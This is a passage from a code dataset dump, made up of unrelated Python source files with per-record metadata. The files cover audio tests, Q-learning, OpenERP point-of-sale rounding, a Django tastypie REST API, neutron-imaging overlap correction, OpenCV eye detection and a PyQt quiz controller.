num_freq, int(np.ceil(num_frames / rate))])\n output_shape = (torch.view_as_complex(spec_stretch) if test_pseudo_complex else spec_stretch).shape\n assert output_shape == expected_shape\n","sub_path":"test/torchaudio_unittest/functional/functional_impl.py","file_name":"functional_impl.py","file_ext":"py","file_size_in_byte":4888,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"511065747","text":"#!/usr/bin/env python3\n\"\"\" Epsilon Greedy \"\"\"\nimport numpy as np\nimport gym\n\n\ndef epsilon_greedy(Q, state, epsilon):\n \"\"\"Function that uses epsilon-greedy\n to determine the next action\"\"\"\n p = np.random.uniform(0, 1)\n if p > epsilon:\n action = np.argmax(Q[state, :])\n else:\n action = np.random.randint(0, Q.shape[1])\n return action\n","sub_path":"reinforcement_learning/0x00-q_learning/2-epsilon_greedy.py","file_name":"2-epsilon_greedy.py","file_ext":"py","file_size_in_byte":364,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"294277731","text":"# -*- coding: utf-8 -*-\n##############################################################################\n#\n# OpenERP, Open Source Management Solution\n# Copyright (C) 2004-2010 OpenERP SA ()\n# Copyright (C) 2011-2015 Serpent Consulting Services Pvt. Ltd.\n# ().\n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU Affero General Public License as\n# published by the Free Software Foundation, either version 3 of the\n# License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU Affero General Public License for more details.\n#\n# You should have received a copy of the GNU Affero General Public License\n# along with this program. 
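# (Aside: a usage sketch for the epsilon_greedy helper defined in the record
# above -- hypothetical 4-state, 2-action Q-table; assumes numpy as np:)
#
#   Q = np.zeros((4, 2))
#   action = epsilon_greedy(Q, state=0, epsilon=0.1)
#   # with probability 1 - epsilon this is np.argmax(Q[0, :]),
#   # otherwise a uniformly random action index in [0, Q.shape[1])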
If not, see .\n#\n##############################################################################\nimport time\nfrom openerp.osv import osv, fields\nfrom openerp import netsvc, tools\nfrom openerp.tools.translate import _\nfrom openerp import workflow\nfrom openerp import SUPERUSER_ID\nimport openerp.addons.decimal_precision as dp\n\nclass pos_order_line(osv.osv):\n _inherit = \"pos.order.line\"\n\n def _amount_line_all(self, cr, uid, ids, field_names, arg, context=None):\n res = dict([(i, {}) for i in ids])\n account_tax_obj = self.pool.get('account.tax')\n cur_obj = self.pool.get('res.currency')\n for line in self.browse(cr, uid, ids, context=context):\n taxes_ids = [ tax for tax in line.product_id.taxes_id if tax.company_id.id == line.order_id.company_id.id ]\n price = line.price_unit * (1 - (line.discount or 0.0) / 100.0)\n taxes = account_tax_obj.compute_all(cr, uid, taxes_ids, price, line.qty, product=line.product_id, partner=line.order_id.partner_id or False)\n\n cur = line.order_id.pricelist_id.currency_id\n res[line.id]['price_subtotal'] = round(taxes['total']*20)/20 \n res[line.id]['price_subtotal_incl'] = round(taxes['total_included']*20)/20 \n return res\n\n def onchange_product_id(self, cr, uid, ids, pricelist, product_id, qty=0, partner_id=False, context=None):\n context = context or {}\n if not product_id:\n return {}\n if not pricelist:\n raise osv.except_osv(_('No Pricelist!'),\n _('You have to select a pricelist in the sale form !\\n' \\\n 'Please set one before choosing a product.'))\n\n price = self.pool.get('product.pricelist').price_get(cr, uid, [pricelist],\n product_id, qty or 1.0, partner_id)[pricelist]\n\n result = self.onchange_qty(cr, uid, ids, product_id, 0.0, qty, price, context=context)\n result['value']['price_unit'] = round(price*20)/20\n return result\n\n def onchange_qty(self, cr, uid, ids, product, discount, qty, price_unit, context=None):\n result = {}\n if not product:\n return result\n account_tax_obj = self.pool.get('account.tax')\n cur_obj = self.pool.get('res.currency')\n\n prod = self.pool.get('product.product').browse(cr, uid, product, context=context)\n\n price = price_unit * (1 - (discount or 0.0) / 100.0)\n taxes = account_tax_obj.compute_all(cr, uid, prod.taxes_id, price, qty, product=prod, partner=False)\n\n result['price_subtotal'] = round(taxes['total']*20)/20 \n result['price_subtotal_incl'] = round(taxes['total_included']*20)/20 \n return {'value': result}\n\n _columns = {\n 'price_subtotal': fields.function(_amount_line_all, multi='pos_order_line_amount', digits_compute=dp.get_precision('Product Price'), string='Subtotal w/o Tax', store=True),\n 'price_subtotal_incl': fields.function(_amount_line_all, multi='pos_order_line_amount', digits_compute=dp.get_precision('Account'), string='Subtotal', store=True),\n }\n\n# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:","sub_path":"pos_rounding/models/point_of_sale.py","file_name":"point_of_sale.py","file_ext":"py","file_size_in_byte":4125,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"440257439","text":"import re\n\n# Import file\nfilename = 'Prob11.in.txt'\n\nwith open(filename) as file:\n\n test_cases = int(file.readline().strip())\n\n while test_cases > 0:\n\n line = file.readline().strip().split()\n\n newLine = []\n\n for word in line:\n reversedWord = re.sub(r'\\b\\S*\\b', lambda m: m.group(0)[::-1], word)\n\n newString = ''\n\n for i in range(len(reversedWord)):\n if word[i].isupper():\n newString += 
reversedWord[i].upper()\n else:\n newString += reversedWord[i].lower()\n\n newLine.append(newString)\n\n print(' '.join(newLine))\n\n test_cases -= 1","sub_path":"Codequest/2017/Prob11.py","file_name":"Prob11.py","file_ext":"py","file_size_in_byte":680,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"134404947","text":"\n# from torch.utils.data.dataset import T\nfrom options import read_options_yaml, print_options_yaml, define_test, gen_test_opts\nfrom IO import save_check, load_check\nfrom molecule import Molecule\nfrom grids import SamplingCoords\nfrom data import MolOnGrid, collate_fn_MolOnGrid, eval_I\nimport torch\nimport numpy as np\nimport pickle\nimport os\nimport os.path as osp\nimport shutil\nfrom torch.utils.data import DataLoader\nimport gen_molecules\n\n\n\nopts = read_options_yaml('./options.yaml')\ndevice = 'cuda'\nprint(\"==============OPTIONS==============\")\nprint_options_yaml(opts)\ntest_opts = gen_test_opts(opts)\nprint_options_yaml(test_opts)\n\n# define model and optimzer\nif test_opts['checkpoint']['from_DDP']:\n os.environ['MASTER_ADDR'] = 'localhost'\n os.environ['MASTER_PORT'] = '12355'\n import torch.distributed as dist\n dist.init_process_group(\"nccl\", rank=0, world_size=1)\nmodel = define_test(test_opts, is_ddp=test_opts['checkpoint']['from_DDP'], device=device)\nassert 'checkpoint' in test_opts and test_opts['checkpoint']['path'] is not None\ncheckpoint_path = test_opts['checkpoint']['path']\nif 'state_dict_only' in test_opts['checkpoint'] and test_opts['checkpoint']['state_dict_only']:\n model.load_state_dict(torch.load(checkpoint_path))\nelse:\n itr, model, _, loss = load_check(checkpoint_path, model=model, optimizer=None)\n\n# test all structures\npath = './test1'\nshutil.copyfile(checkpoint_path, osp.join(path, 'checkpoint.chk'))\ndataset = MolOnGrid(test_opts['molecules'], test_opts['sampling'], path=path, device=device)\ntest_err = np.zeros((6, len(dataset)))\nfor i_struc, data in enumerate(dataset):\n mol, x = data['mol'], data['x']\n y = model(x.to(device)).mean(1)\n vxc = y.detach()\n # calculate new density\n vxc_mat = mol.V_mat(vxc, package='torch', device=device)\n dm_new = mol.dm_from_Vxc_mat(vxc_mat) # KS\n rho_new = mol.density_on_grid(dm_new, deriv=0, package='torch', device=device).squeeze(0).float()\n # use new density for loss\n rho_target = mol.rho('ccsd', package='torch', device=device).squeeze(0).float()\n rho_diff = rho_new - rho_target\n mean_rho_diff, max_rho_diff = rho_diff.abs().mean().item(), rho_diff.abs().max().item()\n print(\"i_struc %d,\\tmean_rho_diff = %10f\\tmax_rho_diff = %10f\" %(i_struc, mean_rho_diff, max_rho_diff))\n \n err_I = eval_I(rho_new, rho_target, mol.grid.weights)\n print(\"errorItg = %10.8e\"%(err_I))\n\n # # scf\n # sampling_coords = SamplingCoords(mol.grid, test_opts['sampling'])\n # sampling_coords.mesh_out()\n # dm_scf = mol.dm_scf_ml(model, sampling_coords, mol.dm_dft, device=device, input_shape='vanilla')\n # dm_scf_diff = dm_scf-mol.dm_ccsd\n # rho_scf_diff = mol.density_on_grid(dm_scf_diff, deriv=0, package='torch', device=device).squeeze(0).float()\n # rho_scf = mol.density_on_grid(dm_scf, deriv=0, package='torch', device=device).squeeze(0).float()\n\n # mean_scf_diff, max_scf_diff = rho_scf_diff.abs().mean().item(), rho_scf_diff.abs().max().item()\n # err_I_scf = eval_I(rho_scf, rho_target, mol.grid.weights)\n # print(\"i_struc %d,\\tmean_SCF_diff = %10f\\tmax_SCF_diff = %10f\" %(i_struc, mean_scf_diff, max_scf_diff))\n # print(\"errorItg_SCF 
= %10.8e\"%(err_I_scf))\n\n test_err[0,i_struc] = mean_rho_diff\n test_err[1,i_struc] = max_rho_diff\n test_err[2,i_struc] = err_I\n # test_err[3,i_struc] = mean_scf_diff\n # test_err[4,i_struc] = max_scf_diff\n # test_err[5,i_struc] = err_I_scf\n\n with open(osp.join(path, 'coords.pkl'), 'ab') as f_c:\n pickle.dump(data['mol'].grid.coords, f_c)\n with open(osp.join(path, 'rho_diff.pkl'), 'ab') as f_rho:\n pickle.dump(rho_diff.cpu().numpy(), f_rho)\n # with open(osp.join(path, 'rho_scf_diff.pkl'), 'ab') as f_rho_scf:\n # pickle.dump(rho_scf_diff.cpu().numpy(), f_rho_scf)\n with open(osp.join(path, 'vxc.pkl'), 'ab') as f_v:\n pickle.dump(vxc.cpu().numpy(), f_v)\n\nnp.save(osp.join(path, 'test_err_log.npy'), test_err)","sub_path":"test_MolOnGrid.py","file_name":"test_MolOnGrid.py","file_ext":"py","file_size_in_byte":3952,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"526767519","text":"#\n# Copyright 2012 Cisco Systems, Inc.\n#\n# Author: Soren Hansen \n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\nfrom django.conf.urls import url\nfrom django.contrib.auth.models import User\nfrom django.core.serializers import json\nfrom django.db import models\nfrom django.utils import simplejson\nfrom tastypie import fields, http\nfrom tastypie.api import Api\nfrom tastypie.authentication import BasicAuthentication, ApiKeyAuthentication\nfrom tastypie.authorization import DjangoAuthorization\nfrom tastypie.bundle import Bundle\nfrom tastypie.constants import ALL_WITH_RELATIONS\nfrom tastypie.models import create_api_key\nfrom tastypie.resources import ModelResource\nfrom repomgmt.models import Architecture, Repository, PackageSource, Series\nfrom repomgmt.models import Subscription, UbuntuSeries\nfrom tastypie.serializers import Serializer\nfrom tastypie.exceptions import Unauthorized\n\napi = Api(api_name='v1')\n\n\nclass PrettyJSONSerializer(Serializer):\n json_indent = 2\n\n def to_json(self, data, options=None):\n options = options or {}\n data = self.to_simple(data, options)\n return json.json.dumps(data, cls=json.DjangoJSONEncoder, sort_keys=True,\n ensure_ascii=False, indent=self.json_indent)\n\n\n# Copied from up-to-date tastypie\nclass MultiAuthentication(object):\n \"\"\"\n An authentication backend that tries a number of backends in order.\n \"\"\"\n def __init__(self, *backends, **kwargs):\n super(MultiAuthentication, self).__init__(**kwargs)\n self.backends = backends\n\n def is_authenticated(self, request, **kwargs):\n \"\"\"\n Identifies if the user is authenticated to continue or not.\n\n Should return either ``True`` if allowed, ``False`` if not or an\n ``HttpResponse`` if you need something custom.\n \"\"\"\n unauthorized = False\n\n for backend in self.backends:\n check = backend.is_authenticated(request, **kwargs)\n\n if check:\n if isinstance(check, http.HttpUnauthorized):\n unauthorized = unauthorized or check\n else:\n request._authentication_backend = backend\n return check\n\n return unauthorized\n\n def 
get_identifier(self, request):\n \"\"\"\n Provides a unique string identifier for the requestor.\n\n This implementation returns a combination of IP address and hostname.\n \"\"\"\n try:\n return request._authentication_backend.get_identifier(request)\n except AttributeError:\n return 'nouser'\n\n\nclass DjangoAuthorizationWithObjLevelPermissions(DjangoAuthorization):\n def create_detail(self, object_list, bundle):\n klass = self.base_checks(bundle.request, bundle.obj.__class__)\n\n if klass is False:\n raise Unauthorized(\"You are not allowed to access that resource.\")\n\n permission = '%s.add_%s' % (klass._meta.app_label, klass._meta.module_name)\n\n if not bundle.request.user.has_perm(permission, bundle.obj):\n raise Unauthorized(\"You are not allowed to access that resource.\")\n\n return True\n\n def update_list(self, object_list, bundle):\n klass = self.base_checks(bundle.request, object_list.model)\n\n if klass is False:\n return []\n\n permission = '%s.change_%s' % (klass._meta.app_label, klass._meta.module_name)\n if not all(bundle.request.user.has_perm(permission, obj) for obj in object_list):\n return []\n\n return object_list\n\n def update_detail(self, object_list, bundle):\n klass = self.base_checks(bundle.request, bundle.obj.__class__)\n\n if klass is False:\n raise Unauthorized(\"You are not allowed to access that resource.\")\n\n permission = '%s.change_%s' % (klass._meta.app_label, klass._meta.module_name)\n\n if not bundle.request.user.has_perm(permission, bundle.obj):\n raise Unauthorized(\"You are not allowed to access that resource.\")\n\n return True\n\n def delete_list(self, object_list, bundle):\n klass = self.base_checks(bundle.request, object_list.model)\n\n if klass is False:\n return []\n\n permission = '%s.delete_%s' % (klass._meta.app_label, klass._meta.module_name)\n\n if not all(bundle.request.user.has_perm(permission, obj) for obj in object_list):\n return []\n\n return object_list\n\n def delete_detail(self, object_list, bundle):\n klass = self.base_checks(bundle.request, bundle.obj.__class__)\n\n if klass is False:\n raise Unauthorized(\"You are not allowed to access that resource.\")\n\n permission = '%s.delete_%s' % (klass._meta.app_label, klass._meta.module_name)\n\n if not bundle.request.user.has_perm(permission, bundle.obj):\n raise Unauthorized(\"You are not allowed to access that resource.\")\n\n return True\n\n def _create_detail(self, object_list, bundle):\n cls = self.base_checks(bundle.request, bundle.obj.__class__)\n if hasattr(cls, 'allow_unprivileged_creation'):\n return cls.allow_unprivileged_creation()\n return super(DjangoAuthorizationWithObjLevelPermissions, self).create_detail(object_list, bundle)\n\n\nclass ApiKeyAuthenticationWithHeaderSupport(ApiKeyAuthentication):\n def extract_credentials(self, request):\n if request.META.get('HTTP_AUTHORIZATION') and request.META['HTTP_AUTHORIZATION'].lower().startswith('apikey '):\n (auth_type, data) = request.META['HTTP_AUTHORIZATION'].split()\n\n if auth_type.lower() != 'apikey':\n raise ValueError(\"Incorrect authorization header.\")\n\n username, api_key = data.split(':', 1)\n else:\n username = request.GET.get('username') or request.POST.get('username')\n api_key = request.GET.get('api_key') or request.POST.get('api_key')\n\n return username, api_key\n\n def is_authenticated(self, request, **kwargs):\n \"\"\"\n Finds the user and checks their API key.\n\n Should return either ``True`` if allowed, ``False`` if not or an\n ``HttpResponse`` if you need something custom.\n \"\"\"\n try:\n 
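            # For reference, extract_credentials() above accepts either of these
            # client-side conventions (illustrative values):
            #
            #   Authorization: ApiKey alice:204db7bcfafb2deb7506b89eb3b9b715b09905c8
            #   ?username=alice&api_key=204db7bcfafb2deb7506b89eb3b9b715b09905c8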
username, api_key = self.extract_credentials(request)\n except ValueError:\n return self._unauthorized()\n\n try:\n user = User.objects.get(username=username)\n except (User.DoesNotExist, User.MultipleObjectsReturned):\n return self._unauthorized()\n\n request.user = user\n return self.get_key(user, api_key)\n\n\nclass ArchitectureResource(ModelResource):\n class Meta:\n queryset = Architecture.objects.all()\n resource_name = 'architecture'\n authentication = MultiAuthentication(BasicAuthentication(),\n ApiKeyAuthenticationWithHeaderSupport())\n authorization = DjangoAuthorizationWithObjLevelPermissions()\n serializer = PrettyJSONSerializer()\n\n\nclass PackageSourceResource(ModelResource):\n class Meta:\n queryset = PackageSource.objects.all()\n resource_name = 'packagesource'\n authentication = MultiAuthentication(BasicAuthentication(),\n ApiKeyAuthenticationWithHeaderSupport())\n authorization = DjangoAuthorizationWithObjLevelPermissions()\n serializer = PrettyJSONSerializer()\n filtering = {'id': ALL_WITH_RELATIONS}\n\n\nclass RepositoryResource(ModelResource):\n series = fields.ToManyField(\"repomgmt.api.SeriesResource\", 'series_set',\n related_name='repository', null=True)\n\n class Meta:\n queryset = Repository.objects.all()\n resource_name = 'repository'\n authentication = MultiAuthentication(BasicAuthentication(),\n ApiKeyAuthenticationWithHeaderSupport())\n authorization = DjangoAuthorizationWithObjLevelPermissions()\n serializer = PrettyJSONSerializer()\n filtering = {'name': ALL_WITH_RELATIONS}\n\n def hydrate_m2m(self, bundle):\n bundle.obj.uploaders.add(bundle.request.user)\n return super(RepositoryResource, self).hydrate_m2m(bundle)\n\nclass HttpAccepted(http.HttpResponse):\n status_code = 202\n\n\nclass SeriesResource(ModelResource):\n repository = fields.ForeignKey(RepositoryResource, 'repository')\n base_ubuntu_series = fields.CharField()\n based_on = fields.ForeignKey('repomgmt.api.SeriesResource', 'update_from', null=True)\n subscriptions = fields.ToManyField(\"repomgmt.api.SubscriptionResource\", 'subscription_set')\n\n\n class Meta:\n queryset = Series.objects.all()\n resource_name = 'series'\n authentication = MultiAuthentication(BasicAuthentication(),\n ApiKeyAuthenticationWithHeaderSupport())\n authorization = DjangoAuthorizationWithObjLevelPermissions()\n serializer = PrettyJSONSerializer()\n filtering = {'repository': ALL_WITH_RELATIONS,\n 'name': ALL_WITH_RELATIONS,\n 'id': ALL_WITH_RELATIONS}\n\n\n @classmethod\n def api_field_from_django_field(cls, f, default=fields.CharField):\n result = default\n \n if f.name == 'state':\n return fields.CharField\n elif f.get_internal_type() in ('DateField', 'DateTimeField'):\n result = fields.DateTimeField\n elif f.get_internal_type() in ('BooleanField', 'NullBooleanField'):\n result = fields.BooleanField\n elif f.get_internal_type() in ('DecimalField', 'FloatField'):\n result = fields.FloatField\n elif f.get_internal_type() in ('IntegerField', 'PositiveIntegerField', 'PositiveSmallIntegerField', 'SmallIntegerField'):\n result = fields.IntegerField\n elif f.get_internal_type() in ('FileField', 'ImageField'):\n result = fields.FileField\n return result\n\n def post_detail(self, request, **kwargs):\n deserialized = self.deserialize(request, request.raw_post_data,\n format=request.META.get('CONTENT_TYPE', 'application/json'))\n deserialized = self.alter_deserialized_detail_data(request,\n deserialized)\n\n basic_bundle = self.build_bundle(request=request)\n obj = self.cached_obj_get(bundle=basic_bundle, 
**self.remove_api_resource_names(kwargs))\n if deserialized.get('action', None) == 'promote':\n obj.promote()\n return HttpAccepted()\n return http.HttpBadRequest()\n\n def __get_resource_uri(self, bundle_or_obj=None, url_name='api_dispatch_list'):\n if bundle_or_obj is None:\n return super(SeriesResource, self).get_resource_uri(bundle_or_obj, url_name)\n\n if isinstance(bundle_or_obj, Bundle):\n obj = bundle_or_obj.obj\n else:\n obj = bundle_or_obj\n\n kwargs = {\n 'resource_name': self._meta.resource_name,\n 'repository__name': obj.repository.name,\n 'name': obj.name\n }\n\n if self._meta.api_name is not None:\n kwargs['api_name'] = self._meta.api_name\n\n return self._build_reverse_url(\"api_dispatch_detail\",\n kwargs=kwargs)\n\n def __override_urls(self):\n return [\n url(r\"^(?P%s)/(?P[\\w\\d_.-]+)/(?P[\\w\\d_.-]+)/$\" % self._meta.resource_name, self.wrap_view('dispatch_detail'), name=\"api_dispatch_detail\"),\n ]\n\n def hydrate_base_ubuntu_series(self, bundle):\n bundle.obj.base_ubuntu_series = UbuntuSeries.objects.filter(name__iendswith=bundle.data['base_ubuntu_series'])[0]\n return bundle\n\n def dehydrate_base_ubuntu_series(self, bundle):\n return bundle.obj.base_ubuntu_series.name\n\n def hydrate_state(self, bundle):\n try:\n state_id = int(bundle.data['state'])\n bundle.data['state'] = state_id\n except ValueError:\n for state_id, state_name in Series.SERIES_STATES:\n if bundle.data['state'] == state_name:\n bundle.data['state'] = state_id\n break\n\n return bundle\n\n def dehydrate_state(self, bundle):\n return bundle.obj.get_state_display()\n\nclass SubscriptionResource(ModelResource):\n package_source = fields.ToOneField(PackageSourceResource, 'source')\n destination_series = fields.ForeignKey(SeriesResource, 'target_series')\n\n class Meta:\n queryset = Subscription.objects.all()\n resource_name = 'subscription'\n authentication = MultiAuthentication(BasicAuthentication(),\n ApiKeyAuthenticationWithHeaderSupport())\n authorization = DjangoAuthorizationWithObjLevelPermissions()\n serializer = PrettyJSONSerializer()\n filtering = {'destination_series': ALL_WITH_RELATIONS,\n 'package_source': ALL_WITH_RELATIONS,\n 'id': ALL_WITH_RELATIONS}\n\n\napi.register(ArchitectureResource())\napi.register(RepositoryResource())\napi.register(SeriesResource())\napi.register(SubscriptionResource())\napi.register(PackageSourceResource())\n\nmodels.signals.post_save.connect(create_api_key, sender=User)\n","sub_path":"repomgmt/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":13887,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"324783994","text":"# this function implements the MCP overlapcorrection as described in: A. S. Tremsin, J. V. Vallerga, J. B. McPhate, and O. H. # W. Siegmund, Optimization of Timepix count rate capabilities for the applications with a periodic input signal, J. Instrum., vol. 9, no. 5, 2014. 
https://doi.org/10.1088/1748-0221/9/05/C05026\n\n\nimport glob,sys,os\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom IPython.display import display, HTML\nimport numpy as np\nfrom astropy.io import fits\nimport shutil\n\ndef interAssig(value,intervalDict,df_shutterCount, tolerance): \n #auxiliary function for OverLapCorrection\n for keyInt in intervalDict:\n if (intervalDict[keyInt][0]-tolerance)<= value <=(intervalDict[keyInt][1]+tolerance):\n return keyInt,df_shutterCount['Counts'][keyInt]\n\ndef OverLapCorrection(folder_input, folder_output, filename_output, num_windows):\n \n # here fits and txt files are sorted, the last fits is excluded being the SumImg\n sorted_fits= sorted(glob.glob(folder_input+'/*.fits'))[:-1]\n sorted_TXT= sorted(glob.glob(folder_input+'/*.txt'))\n #display(sorted_TXT)\n\n # the output folder is created if non-existing\n if not os.path.exists(folder_output):\n os.makedirs(folder_output)\n\n# display(sorted_TXT[0]) #shutter counts\n# display(sorted_TXT[1]) # shutter times\n# display(sorted_TXT[2]) #spectra\n# display(sorted_TXT[3]) # status\n filename_spectra= sorted_TXT[2]\n filename_shuttercount = sorted_TXT[0]\n filename_shuttertime = sorted_TXT[1]\n df = pd.read_csv( filename_spectra,delim_whitespace=True,header=None,\n names=['Time','Spectra'])\n df['diff']=df['Time'].diff()\n df['Spectra']= df['Spectra']/df['Spectra'].max()\n df['diff']= df['diff']/df['diff'].max()\n\n df_shutterTime = pd.read_csv(filename_shuttertime,delim_whitespace=True,header=None,\n names=['t0','t1'], nrows=num_windows)\n\n df_shutterCount = pd.read_csv(filename_shuttercount,delim_whitespace=True,header=None,\n names=['Counts'], nrows=num_windows, index_col=0)\n\n# display(df_shutterCount)\n\n\n df_shutterTime=np.asarray(df_shutterTime.stack(level=[0]))\n\n# display(df_shutterTime)\n\n df.plot(x='Time',y=['Spectra','diff'],grid=True,figsize=(8,6))\n sumTime = 0\n TimeArray = np.zeros(num_windows*2)\n index=0\n for i in df_shutterTime:\n print(i)\n sumTime += i\n TimeArray[index] = sumTime\n index += 1\n plt.axvline(x=sumTime)\n\n\n plt.show()\n# display(TimeArray)\n interval = {int(key):(value1,value2) for key,value1,value2 in zip(range(len(TimeArray)),TimeArray[::2],TimeArray[1::2])}\n tolerance= (TimeArray[2]-TimeArray[1])/2 #to lower down\n \n dfName = pd.DataFrame(sorted_fits,columns=['name'])\n dfName['ToF'] = df['Time']\n dfName['ShutterWindow']= dfName['ToF'].apply(lambda i:interAssig(i,interval,df_shutterCount, tolerance))\n indexname=0\n \n \n\n \n i_wb =0 # index used to initialize white beam image\n\n for names in dfName.groupby('ShutterWindow'):\n \n i=0;\n for idx, value in names[1]['name'].iteritems():\n with fits.open(value) as f:\n array = (f[0].data) # load the image file, size is rows x columns (es. 512x512)\n \n if i==0:\n sumim=np.zeros(np.shape(array)) # create a blank sum img for each new window\n prev_array=np.zeros(np.shape(array)) # variable containing the previous array, initialized to zeros (P. Boillat 12.7.19)\n i += 1 # (P. Boillat 12.7.19)\n \n# sumim+=array # pixel wise sum of loaded imgs\n sumim += (array.astype(float)/2 + prev_array.astype(float)/2) # pixel wise sum of loaded imgs (modified P. 
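            # The correction applied below follows the Tremsin et al. reference in
            # the header comment: if P is the per-pixel probability that the pixel
            # already fired within the current shutter window, then
            #
            #   P     = sumim / shutter_count   # accumulated counts per trigger
            #   newim = array / (1 - P)         # overlap- (dead-time-) corrected
            #
            # i.e. raw counts are scaled up by 1/(1 - P) to undo MCP saturation.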
Boillat 12.7.19)\n \n if i_wb==0:\n white_beam=np.zeros(np.shape(array))\n i_wb = 1\n \n# if i==0:\n# P=0\n# i+=1 \n# else:\n P=sumim/names[0][1] # each pixel divided by the shutter count\n\n newim = array/(1-P) # image correction\n newim= newim.astype(float) # data casting, somehow the convertion to int does not work properly, I have then an error of wrong pixel depth\n white_beam += newim\n filename=filename_output+str(indexname).zfill(5)\n # display(filename)\n indexname+=1\n fits.writeto(folder_output+filename+'.fits',newim)\n\n# print(folder_output + filename_output + 'SummedImg.fits')\n fits.writeto(folder_output + filename_output + 'SummedImg.fits', white_beam)\n\n# finally I copy the txt files because they can be usefull for the future\n for txt in sorted_TXT:\n filename = txt\n destname = folder_output\n shutil.copy(filename, destname) \n \n \n \n ","sub_path":"python/ToF_notebooks/MCPOverLapCorrection/MCPOverLapCorrection.py","file_name":"MCPOverLapCorrection.py","file_ext":"py","file_size_in_byte":5034,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"103201899","text":"from cv2 import cv2\r\n\r\ntrainedClassifierFace = cv2.CascadeClassifier(r'E:\\ImageProcessingdenemeleri\\Trained Classifiers\\haarcascade_frontalface_default.xml')\r\ntrainedClassifierEye = cv2.CascadeClassifier(r'E:\\ImageProcessingdenemeleri\\Trained Classifiers\\haarcascade_eye_tree_eyeglasses.xml')\r\nmyVid = cv2.VideoCapture(r'E:\\ImageProcessingdenemeleri\\videos\\7.mp4')\r\n\r\nwhile myVid.isOpened():\r\n _, frame = myVid.read()\r\n frameG = cv2.cvtColor(frame,cv2.COLOR_BGR2GRAY)\r\n faces = trainedClassifierFace.detectMultiScale(frameG,2,2)\r\n for (x,y,w,h) in faces:\r\n roiFace = frame[y:y+h,x:x+w]\r\n roiFaceG = frameG[y:y+h,x:x+w]\r\n eyes = trainedClassifierEye.detectMultiScale(roiFaceG,2,2)\r\n for (ex,ey,ew,eh) in eyes:\r\n cv2.rectangle(roiFace,(ex,ey),(ex+ew,ey+eh),(0,255,255),2)\r\n cv2.imshow('Eye Detection',frame)\r\n k = cv2.waitKey(1) & 0xFF\r\n if k == 27:\r\n break\r\n\r\nmyVid.release()\r\ncv2.destroyAllWindows()","sub_path":"openCV/Exercises/ex54_EyeDetection2.py","file_name":"ex54_EyeDetection2.py","file_ext":"py","file_size_in_byte":967,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"426091676","text":"import health\nimport matplotlib.pyplot as plt\nfrom textblob import TextBlob\n\nfrom wordcloud import WordCloud\n\ndiseaseSearch = 'disease'\n\nlist_of_report = health.get_all_reports()\n\ncombinedDiseases = ''\n\nfor dis in list_of_report:\n combinedDiseases += ' ' + dis['disease']\n\nhealthBlob = TextBlob(combinedDiseases)\n\ndiseaseDictionary = dict()\n\nfor word in healthBlob.words:\n diseaseDictionary[word.lower()] = healthBlob.word_counts[word.lower()]\n\n\n\n\nwordCloud = WordCloud(background_color = 'white').generate_from_frequencies(diseaseDictionary)\nplt.title('Diseases in the US')\nplt.axis('off')\n\nfor dis in list_of_report:\n healthBlob = TextBlob(dis['disease'])\n\n\nplt.imshow(wordCloud, interpolation = 'bilinear')\nplt.show()\n\n\n\n\n\n\n\n\nplt.show()\n","sub_path":"stayHealthy.py","file_name":"stayHealthy.py","file_ext":"py","file_size_in_byte":749,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"567806454","text":"#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n\r\nfrom PyQt4 import QtCore, QtGui, QtNetwork\r\nfrom MySQL import HfDAO\r\nimport refresh\r\nimport display\r\n\r\ntry:\r\n _fromUtf8 
= QtCore.QString.fromUtf8\r\nexcept AttributeError:\r\n def _fromUtf8(s):\r\n return s\r\n\r\ntry:\r\n _encoding = QtGui.QApplication.UnicodeUTF8\r\n def _translate(context, text, disambig):\r\n return QtGui.QApplication.translate(context, text, disambig, _encoding)\r\nexcept AttributeError:\r\n def _translate(context, text, disambig):\r\n return QtGui.QApplication.translate(context, text, disambig)\r\n\r\n# 数据库dao实例\r\nmdb = HfDAO()\r\n\r\nlistGrade = [g[1] for g in mdb.getAllGrade()]\r\nlistTeamName = [t[1] for t in mdb.getAllTeamName()]\r\ngradeTeam1List = []\r\ngradeTeam2List = []\r\ngradeTeam3List = []\r\ngradeTeam4List = []\r\ngradeTeam5List = []\r\ngradeTeam6List = []\r\ngradeTeamList = [gradeTeam1List, gradeTeam2List, gradeTeam3List, gradeTeam4List, gradeTeam5List, gradeTeam6List]\r\nfor (gradeTeam, grade) in zip(gradeTeamList, listGrade):\r\n gradeTeam.append(str(grade))\r\nclientDict = {}\r\nanswerList = ['Z', 'Z', 'Z', 'Z', 'Z', 'Z']\r\nnextQuestionId = mdb.getNextQuestionId()\r\ncurrentQuestionId = mdb.getCurrentQuestionId()\r\nteamId = 0\r\ntimePause = False\r\nhideSelection = False\r\n# isClearJudge = False\r\n\r\nclass ControlModule(object):\r\n def __init__(self, Dialog):\r\n self.labelTeamList = []\r\n 